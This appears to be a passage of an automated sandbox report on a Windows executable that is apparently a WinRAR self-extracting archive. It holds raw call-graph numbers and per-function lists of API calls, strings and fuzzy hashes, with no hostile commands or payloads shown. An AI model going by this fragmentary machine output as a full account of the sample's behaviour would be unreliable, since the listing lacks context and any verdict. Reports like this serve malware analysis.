22832->22796 22834 799de0 22833->22834 22834->22832 22835 799de4 DeleteFileW 22834->22835 22835->22832 22836->22825 22838 79962c ReadFile 22837->22838 22839 799621 GetStdHandle 22837->22839 22840 799645 22838->22840 22841 799665 22838->22841 22839->22838 22850 79971a 22840->22850 22841->22804 22843 79964c 22844 79965a 22843->22844 22845 79966d GetLastError 22843->22845 22846 79967c 22843->22846 22848 799613 GetFileType 22844->22848 22845->22841 22845->22846 22846->22841 22847 79968c GetLastError 22846->22847 22847->22841 22847->22844 22848->22841 22849->22803 22851 799720 22850->22851 22852 799723 GetFileType 22850->22852 22851->22843 22853 799731 22852->22853 22853->22843 22855 7998a3 22854->22855 22858 799902 22854->22858 22856 7998da SetFilePointer 22855->22856 22857 7998f8 GetLastError 22856->22857 22856->22858 22857->22858 22858->22812 22859 796eae 68 API calls 22858->22859 22859->22812 22861 7b494d _abort 22860->22861 22862 7b4a9b _abort GetModuleHandleW 22861->22862 22870 7b4965 22861->22870 22864 7b4959 22862->22864 22864->22870 22894 7b4adf GetModuleHandleExW 22864->22894 22868 7b496d 22869 7b49e2 22868->22869 22881 7b4a0b 22868->22881 22902 7b5447 20 API calls _abort 22868->22902 22873 7b49fa 22869->22873 22877 7b56d0 _abort 5 API calls 22869->22877 22882 7b76d6 EnterCriticalSection 22870->22882 22871 7b4a28 22886 7b4a5a 22871->22886 22872 7b4a54 22903 7bf149 5 API calls _ValidateLocalCookies 22872->22903 22878 7b56d0 _abort 5 API calls 22873->22878 22877->22873 22878->22881 22883 7b4a4b 22881->22883 22882->22868 22904 7b771e LeaveCriticalSection 22883->22904 22885 7b4a24 22885->22871 22885->22872 22905 7b7b13 22886->22905 22889 7b4a88 22892 7b4adf _abort 8 API calls 22889->22892 22890 7b4a68 GetPEB 22890->22889 22891 7b4a78 GetCurrentProcess TerminateProcess 22890->22891 22891->22889 22893 7b4a90 ExitProcess 22892->22893 22895 7b4b09 GetProcAddress 22894->22895 22896 7b4b2c 22894->22896 22899 7b4b1e 22895->22899 22897 7b4b3b 22896->22897 22898 7b4b32 FreeLibrary 22896->22898 22900 7ad783 _ValidateLocalCookies 5 API calls 22897->22900 22898->22897 22899->22896 22901 7b4b45 22900->22901 22901->22870 22902->22869 22904->22885 22906 7b7b38 22905->22906 22910 7b7b2e 22905->22910 22907 7b7735 _abort 5 API calls 22906->22907 22907->22910 22908 7ad783 _ValidateLocalCookies 5 API calls 22909 7b4a64 22908->22909 22909->22889 22909->22890 22910->22908 23884 7b7216 21 API calls 23885 7bee16 CloseHandle 23825 7ad002 38 API calls 2 library calls 23913 7b6f03 21 API calls 2 library calls 23864 7b3501 QueryPerformanceFrequency QueryPerformanceCounter 23914 7bc301 21 API calls __vswprintf_c_l 23888 7b0a00 6 API calls 4 library calls 23829 7b88fb GetCommandLineA GetCommandLineW 21916 7918fb 127 API calls __EH_prolog 23865 7ad5ff 27 API calls pre_c_initialization 23915 7ac3ea 19 API calls ___delayLoadHelper2@8 23891 7916e3 79 API calls 23833 7bc0e4 51 API calls 23919 7b4bda 52 API calls 3 library calls 23835 7aaa99 96 API calls 4 library calls 23868 79ddda FreeLibrary 22239 7ac0d0 22240 7ac0dd 22239->22240 22247 79d142 22240->22247 22243 793f5b _swprintf 51 API calls 22244 7ac103 SetDlgItemTextW 22243->22244 22254 7a991e PeekMessageW 22244->22254 22248 79d172 22247->22248 22249 79d17b LoadStringW 22248->22249 22250 79d191 LoadStringW 22248->22250 22249->22250 22251 79d1a3 22249->22251 22250->22251 22257 79c91f 22251->22257 22253 79d1b1 22253->22243 22255 7a995a 22254->22255 22256 7a9939 GetMessageW TranslateMessage DispatchMessageW 22254->22256 22256->22255 22258 79c929 22257->22258 22259 79c99d _strlen 22258->22259 22264 79c9fb _wcschr _wcsrchr 22258->22264 22265 7a0905 WideCharToMultiByte 22258->22265 22266 7a0905 WideCharToMultiByte 22259->22266 22262 79c9c8 _strlen 22263 793f5b _swprintf 51 API calls 22262->22263 22263->22264 22264->22253 22265->22259 22266->22262 23839 7a7cd5 GetClientRect 23893 7b4ed4 55 API calls _free 23920 7b6fcb 71 API calls _free 22919 799bc8 22920 799bdb 22919->22920 22921 799bd4 22919->22921 22922 799be1 GetStdHandle 22920->22922 22924 799bec 22920->22924 22922->22924 22923 799c41 WriteFile 22923->22924 22924->22921 22924->22923 22925 799c0c 22924->22925 22926 799c11 WriteFile 22924->22926 22928 799cb4 22924->22928 22930 796d5a 56 API calls 22924->22930 22925->22924 22925->22926 22926->22924 22926->22925 22931 796f67 68 API calls 22928->22931 22930->22924 22931->22921 23894 7a86cb 22 API calls 23895 7aaa99 101 API calls 4 library calls 23896 7b7ecd 6 API calls _ValidateLocalCookies 23922 7a63c3 115 API calls 23795 7ac7c0 23796 7ac791 23795->23796 23796->23795 23797 7acabc ___delayLoadHelper2@8 19 API calls 23796->23797 23797->23796 21918 7b8abc 31 API calls _ValidateLocalCookies 23924 7ae7b0 51 API calls 2 library calls 23925 7a4fb5 120 API calls __vswprintf_c_l 22124 7910a9 22129 795b35 22124->22129 22130 795b3f __EH_prolog 22129->22130 22136 79ac66 22130->22136 22132 795b4b 22142 795d2a GetCurrentProcess GetProcessAffinityMask 22132->22142 22137 79ac70 __EH_prolog 22136->22137 22143 79ddc2 73 API calls 22137->22143 22139 79ac82 22144 79ad7e 22139->22144 22143->22139 22145 79ad90 ___scrt_get_show_window_mode 22144->22145 22148 79fce6 22145->22148 22151 79fca6 GetCurrentProcess GetProcessAffinityMask 22148->22151 22152 79acf8 22151->22152 22152->22132 23926 7aaa99 91 API calls 3 library calls 23898 7b8aaa GetProcessHeap 23870 7a899a GdipCloneImage GdipAlloc 23900 797a9b GetCurrentProcess GetLastError CloseHandle 23901 7b0e9d 48 API calls 22911 7b7695 22912 7b76a0 22911->22912 22913 7b79a7 11 API calls 22912->22913 22914 7b76c9 22912->22914 22915 7b76c5 22912->22915 22913->22912 22917 7b76ed DeleteCriticalSection 22914->22917 22917->22915 23792 7ac782 23793 7ac730 23792->23793 23794 7acabc ___delayLoadHelper2@8 19 API calls 23793->23794 23794->23793 23848 799481 72 API calls 23798 791383 75 API calls 3 library calls 23871 7a9584 GetDlgItem EnableWindow ShowWindow SendMessageW

                                                                                                                                        Executed Functions

                                                                                                                                        Function 007AC131 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 199filesleeptimeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079F353: GetModuleHandleW.KERNEL32 ref: 0079F36B
                                                                                                                                          • Part of subcall function 0079F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0079F383
                                                                                                                                          • Part of subcall function 0079F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0079F3A6
                                                                                                                                          • Part of subcall function 007A8B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 007A8B96
                                                                                                                                          • Part of subcall function 007A9036: OleInitialize.OLE32(00000000), ref: 007A904F
                                                                                                                                          • Part of subcall function 007A9036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007A9086
                                                                                                                                          • Part of subcall function 007A9036: SHGetMalloc.SHELL32(007D20E8), ref: 007A9090
                                                                                                                                          • Part of subcall function 007A0722: GetCPInfo.KERNEL32(00000000,?), ref: 007A0733
                                                                                                                                          • Part of subcall function 007A0722: IsDBCSLeadByte.KERNEL32(00000000), ref: 007A0747
                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 007AC179
                                                                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 007AC1A0
                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 007AC1B1
                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 007AC1EB
                                                                                                                                          • Part of subcall function 007ABE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ABE20
                                                                                                                                          • Part of subcall function 007ABE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ABE5C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007AC1F4
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,007E7938,00000800), ref: 007AC20F
                                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,007E7938), ref: 007AC221
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 007AC228
                                                                                                                                        • _swprintf.LIBCMT ref: 007AC267
                                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 007AC279
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 007AC27C
                                                                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 007AC293
                                                                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 007AC2E4
                                                                                                                                        • Sleep.KERNEL32(?), ref: 007AC312
                                                                                                                                        • DeleteObject.GDI32 ref: 007AC351
                                                                                                                                        • DeleteObject.GDI32(?), ref: 007AC35D
                                                                                                                                          • Part of subcall function 007AA8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 007AA92C
                                                                                                                                          • Part of subcall function 007AA8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 007AA953
                                                                                                                                        • CloseHandle.KERNEL32 ref: 007AC39C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$*a}$*x~$8y~$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                        • API String ID: 985665271-1214139122
                                                                                                                                        • Opcode ID: 9b3b3af242c646f9c5e43a51489d1300185ce981aad43113e27ad15ecebe0fa4
                                                                                                                                        • Instruction ID: 1cb247041f0b7d86d2900efd8673b1a3b938adac1ee824c9627bc019c86160b4
                                                                                                                                        • Opcode Fuzzy Hash: 9b3b3af242c646f9c5e43a51489d1300185ce981aad43113e27ad15ecebe0fa4
                                                                                                                                        • Instruction Fuzzy Hash: 446127B1905344FFD721ABA5EC49F2B37ACAB8A700F04852EF54492192DB7C9D40C7E6
                                                                                                                                        Function 007A8BD0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92memorywindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 598 7a8bd0-7a8beb FindResourceW 599 7a8bf1-7a8c03 SizeofResource 598->599 600 7a8cc6-7a8cc8 598->600 601 7a8c23-7a8c25 599->601 602 7a8c05-7a8c14 LoadResource 599->602 604 7a8cc5 601->604 602->601 603 7a8c16-7a8c21 LockResource 602->603 603->601 605 7a8c2a-7a8c3f GlobalAlloc 603->605 604->600 606 7a8cbf-7a8cc4 605->606 607 7a8c41-7a8c4a GlobalLock 605->607 606->604 608 7a8cb8-7a8cb9 GlobalFree 607->608 609 7a8c4c-7a8c6a call 7ae000 CreateStreamOnHGlobal 607->609 608->606 612 7a8c6c-7a8c84 call 7a8b65 609->612 613 7a8cb1-7a8cb2 GlobalUnlock 609->613 612->613 617 7a8c86-7a8c8e 612->617 613->608 618 7a8ca9-7a8cad 617->618 619 7a8c90-7a8ca4 GdipCreateHBITMAPFromBitmap 617->619 618->613 619->618 620 7a8ca6 619->620 620->618
                                                                                                                                        APIs
                                                                                                                                        • FindResourceW.KERNELBASE(00000066,PNG,?,?,007A9AC8,00000066), ref: 007A8BE1
                                                                                                                                        • SizeofResource.KERNEL32(00000000,75295780,?,?,007A9AC8,00000066), ref: 007A8BF9
                                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,007A9AC8,00000066), ref: 007A8C0C
                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,007A9AC8,00000066), ref: 007A8C17
                                                                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,007A9AC8,00000066), ref: 007A8C35
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007A8C42
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 007A8C62
                                                                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007A8C9D
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007A8CB2
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 007A8CB9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                                                                        • String ID: PNG
                                                                                                                                        • API String ID: 3656887471-364855578
                                                                                                                                        • Opcode ID: 65a200df37ca53cf6bbc7e7dcfe337e55df71a71ff4a4b5f8f246bd9b28bc3a2
                                                                                                                                        • Instruction ID: fba835cd74a5a272aac2b41a3796543ce454f8e59618dc6505c399bf3a6ccc26
                                                                                                                                        • Opcode Fuzzy Hash: 65a200df37ca53cf6bbc7e7dcfe337e55df71a71ff4a4b5f8f246bd9b28bc3a2
                                                                                                                                        • Instruction Fuzzy Hash: 6C216FB1602605EFC7619F61DD49D2BBBA8EF867A1B04466CF845C6260DB39DC008AF2
                                                                                                                                        Function 0079A273 Relevance: 7.6, APIs: 5, Instructions: 108fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 860 79a273-79a299 call 7acec0 863 79a29b-79a2ae FindFirstFileW 860->863 864 79a30d-79a316 FindNextFileW 860->864 865 79a334-79a3dd call 79f10e call 79b902 call 7a01c1 * 3 863->865 866 79a2b4-79a2cf call 79b275 863->866 867 79a318-79a326 GetLastError 864->867 868 79a32c-79a32e 864->868 870 79a3e2-79a3f5 865->870 875 79a2d1-79a2e4 FindFirstFileW 866->875 876 79a2e6-79a2ef GetLastError 866->876 867->868 868->865 868->870 875->865 875->876 878 79a2f1-79a2f4 876->878 879 79a300 876->879 878->879 881 79a2f6-79a2f9 878->881 882 79a302-79a308 879->882 881->879 884 79a2fb-79a2fe 881->884 882->870 884->882
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A2A8
                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A2DE
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A2E6
                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A30E
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A31A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 869497890-0
                                                                                                                                        • Opcode ID: 6523dcb740fc3b542d82aa016829ff9b9daa3fa251624bd8c30c36aeb817de2f
                                                                                                                                        • Instruction ID: 28b2cbdc365079208274768e80bda0119a33c58ccadb50c77be32ea74c37e9fb
                                                                                                                                        • Opcode Fuzzy Hash: 6523dcb740fc3b542d82aa016829ff9b9daa3fa251624bd8c30c36aeb817de2f
                                                                                                                                        • Instruction Fuzzy Hash: DF415E72609245EFC724EF64D884ADAF7E8BB89350F104A2AF599D3240D738A9548BD2
                                                                                                                                        Function 007B4A5A Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,007B4A30,?,007C7F68,0000000C,007B4B87,?,00000002,00000000), ref: 007B4A7B
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,007B4A30,?,007C7F68,0000000C,007B4B87,?,00000002,00000000), ref: 007B4A82
                                                                                                                                        • ExitProcess.KERNEL32 ref: 007B4A94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                        • Opcode ID: 5bb06e6c60b782bd375e2027480fb9416d4a45c20ad59fd4397fd90b0dd36811
                                                                                                                                        • Instruction ID: 9f215b7b93b1ee55f8c3753f61742bee7192d69d79c214644d82c3537a29f976
                                                                                                                                        • Opcode Fuzzy Hash: 5bb06e6c60b782bd375e2027480fb9416d4a45c20ad59fd4397fd90b0dd36811
                                                                                                                                        • Instruction Fuzzy Hash: EBE09231050508EBCF11AF64D90DB897B6AFB50341B058418F8099A522CB3ADD92CBC8
                                                                                                                                        Function 00798409 Relevance: 3.9, APIs: 2, Instructions: 888COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0079840E
                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00798870
                                                                                                                                          • Part of subcall function 007980F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,007986E9,?,-00000930,?), ref: 007981BB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharH_prologUpper_memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4047935103-0
                                                                                                                                        • Opcode ID: 9f8573c7af7b1f2f2b1019a33b1d1d834806954ab266fa7f9072a32ad7779451
                                                                                                                                        • Instruction ID: 07e8c388c4bdecc4db8ed4b4693e1e896be073de0670c4ec00395bfe2380d117
                                                                                                                                        • Opcode Fuzzy Hash: 9f8573c7af7b1f2f2b1019a33b1d1d834806954ab266fa7f9072a32ad7779451
                                                                                                                                        • Instruction Fuzzy Hash: C5722A70504185EEDF65DF64D885BF97BA9BF06300F0841FAE9499F243DB389A88C762
                                                                                                                                        Function 007A5984 Relevance: .3, Instructions: 325COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: 1143a4008c839d9076fb5bbee5c49d376748c22e65fba208b54fe09371535c74
                                                                                                                                        • Instruction ID: 5c46f950e1f63f3b8bf063776ea56a4f2c92574fc08df656bb425c263ffcb537
                                                                                                                                        • Opcode Fuzzy Hash: 1143a4008c839d9076fb5bbee5c49d376748c22e65fba208b54fe09371535c74
                                                                                                                                        • Instruction Fuzzy Hash: F0D126B1A047458FCB14CF28C88475BBBE1BFD6318F08476DE8449B642D738E959CBA6
                                                                                                                                        Function 007A9B4F Relevance: 102.2, APIs: 46, Strings: 12, Instructions: 724COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 007A9B54
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prologItemTextWindow
                                                                                                                                        • String ID: !}$"%s"%s$*A}$*a}$*x~$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                        • API String ID: 810644672-615544423
                                                                                                                                        • Opcode ID: f09aeccdaa81a29abd0807e77b245b5f1221e7a2a07df0d343fc3f40c23d73e5
                                                                                                                                        • Instruction ID: 825102534469a2bded3c72e61ef0060fda5333640df3bc78da91560706a8ec95
                                                                                                                                        • Opcode Fuzzy Hash: f09aeccdaa81a29abd0807e77b245b5f1221e7a2a07df0d343fc3f40c23d73e5
                                                                                                                                        • Instruction Fuzzy Hash: EA424671941349FFEB21AF60DC8AFAE3BB8AB56700F008119F601A60D2D77D4D55CB6A
                                                                                                                                        Function 0079F353 Relevance: 77.3, APIs: 22, Strings: 22, Instructions: 314libraryfileloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 257 79f353-79f375 call 7acec0 GetModuleHandleW 260 79f3c8-79f62f 257->260 261 79f377-79f38e GetProcAddress 257->261 262 79f6fd-79f72e GetModuleFileNameW call 79b88c call 79f10e 260->262 263 79f635-79f640 call 7b462a 260->263 264 79f3a0-79f3aa GetProcAddress 261->264 265 79f390-79f39d 261->265 277 79f730-79f73a call 79a8e0 262->277 263->262 273 79f646-79f673 GetModuleFileNameW CreateFileW 263->273 264->260 266 79f3ac-79f3c3 264->266 265->264 266->260 275 79f6f1-79f6f8 CloseHandle 273->275 276 79f675-79f683 SetFilePointer 273->276 275->262 276->275 278 79f685-79f6a2 ReadFile 276->278 284 79f73c-79f740 call 79f309 277->284 285 79f747 277->285 278->275 280 79f6a4-79f6c9 278->280 282 79f6e6-79f6ef call 79ef07 280->282 282->275 291 79f6cb-79f6e5 call 79f309 282->291 292 79f745 284->292 288 79f749-79f74b 285->288 289 79f76d-79f78f call 79b902 GetFileAttributesW 288->289 290 79f74d-79f76b CompareStringW 288->290 293 79f791-79f795 289->293 299 79f799 289->299 290->289 290->293 291->282 292->288 293->277 297 79f797 293->297 300 79f79d-79f7a2 297->300 299->300 301 79f7a4 300->301 302 79f7d6-79f7d8 300->302 305 79f7a6-79f7c8 call 79b902 GetFileAttributesW 301->305 303 79f7de-79f7f5 call 79b8d6 call 79a8e0 302->303 304 79f8e5-79f8ef 302->304 315 79f85d-79f890 call 793f5b AllocConsole 303->315 316 79f7f7-79f858 call 79f309 * 2 call 79d142 call 793f5b call 79d142 call 7a8ccb 303->316 311 79f7ca-79f7ce 305->311 312 79f7d2 305->312 311->305 314 79f7d0 311->314 312->302 314->302 321 79f8dd-79f8df ExitProcess 315->321 322 79f892-79f8d7 GetCurrentProcessId AttachConsole call 7b20b3 GetStdHandle WriteConsoleW Sleep FreeConsole 315->322 316->321 322->321
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32 ref: 0079F36B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0079F383
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0079F3A6
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0079F651
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0079F669
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0079F67B
                                                                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,007C0858,00000000), ref: 0079F69A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0079F6F2
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0079F708
